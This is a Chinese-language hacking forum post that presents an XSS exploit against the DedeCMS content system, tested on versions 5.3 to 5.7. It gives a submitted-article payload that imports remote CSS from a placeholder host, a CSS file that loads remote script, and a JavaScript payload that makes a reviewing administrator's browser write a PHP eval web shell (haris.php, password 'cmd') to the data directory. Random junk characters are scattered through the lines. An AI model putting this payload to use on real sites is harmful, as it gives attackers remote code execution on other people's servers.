找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1884|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
/ ^* |5 Z% K7 G" L为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰); K4 `7 S5 `8 n& n  O
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
' \1 _0 m/ g4 W, J* Q  p下面说说利用方法。
. [& D6 D: i3 K. E6 N' B9 v; K# r! d条件有2个:( t. x: K7 ?" O) G0 T' F
1.开启注册
% D: _8 s& f6 H6 h! A; R; V; v2.开启投稿' v9 n; i+ X, H$ H& N4 ~
注册会员----发表文章
: u) C4 @. A; U7 d6 ]+ t内容填写:
- i0 V6 b6 J4 s复制代码/ B" q/ ~: m. A, d- p# i
<style>@im\port'\http://xxx.com/xss.css';</style>* a$ L( K5 V3 @6 m0 k: u9 P
新建XSS.Css  A% g+ {- M( j7 R; g$ U, u
复制代码9 H* A& l. E4 R0 S  A" @/ }  m
.body{
$ J& l+ A" ~. x& c4 S' ebackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
% P. G- a6 @9 v% [7 b新建xss.js 内容为- G$ ]" ]4 H: b0 x: [: Z
复制代码
. I/ i7 ?& @1 I1.var request = false;8 A1 I0 \* u1 w8 r2 n% J
2.if(window.XMLHttpRequest) {; V* {# G" F) K, x- _* A
3.request = new XMLHttpRequest();1 b: U, z! b, i% B' f
4.if(request.overrideMimeType) {
  o/ N* B+ C! d1 [# Q3 ~# E$ _5.request.overrideMimeType('text/xml');" ~- T* x1 T6 x8 H& p' [3 N3 H
6.}
6 a8 I  K0 ?  D; Q2 G- S7.} else if(window.ActiveXObject) {
' s- y9 \2 D$ P6 G( n8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];; P  y( m$ \" u: i# I$ W/ z6 ]) G
9.for(var i=0; i<versions.length; i++) {' \3 L5 q, P( o2 ?( C% j. a+ I6 r
10.try {2 F6 |# u# J" }' w
11.request = new ActiveXObject(versions);
  E/ B4 ~+ @$ S5 G" n, r& r/ A5 M12.} catch(e) {}2 k+ T  G- T7 I& z) A/ ]
13.}
  U5 ?+ R. E3 x2 H/ v14.}3 J1 B4 z5 P9 C) o" n
15.xmlhttp=request;; Y) g" U; |2 |2 B( o% c9 V. @% m( k
16.function getFolder( url ){
4 t% Q9 Y/ \( O% ]17. obj = url.split('/')
2 V7 C" Z- H4 _3 r5 j0 V9 T4 r3 y18. return obj[obj.length-2]. S4 L1 P+ H/ P( ^7 H! M
19.}
" t+ {0 T4 K7 B5 H+ d20.oUrl = top.location.href;0 n# S. A. z9 o1 Y+ s. t- E# v
21.u = getFolder(oUrl);
, y" t- y" x& F22.add_admin();2 ~+ u/ g% u' w" \' I
23.function add_admin(){! S" x7 O  M: D% }3 E
24.var url= "/"+u+"/sys_sql_query.php";+ A. f3 U3 r9 j. ]* z, @5 o
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
% D' [. z, j0 s26.xmlhttp.open("POST", url, true);
/ r" L" D* S3 ?. }4 C* N/ }1 O  X* i27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");+ p" v- i+ \* b7 b6 x
28.xmlhttp.setRequestHeader("Content-length", params.length);
+ U7 \/ E% e' A  K/ L3 }29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
' b+ f- e1 `, {30.xmlhttp.send(params);
: V* A/ J7 J% S: M# z31.}- T) C3 S3 b! _  R
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表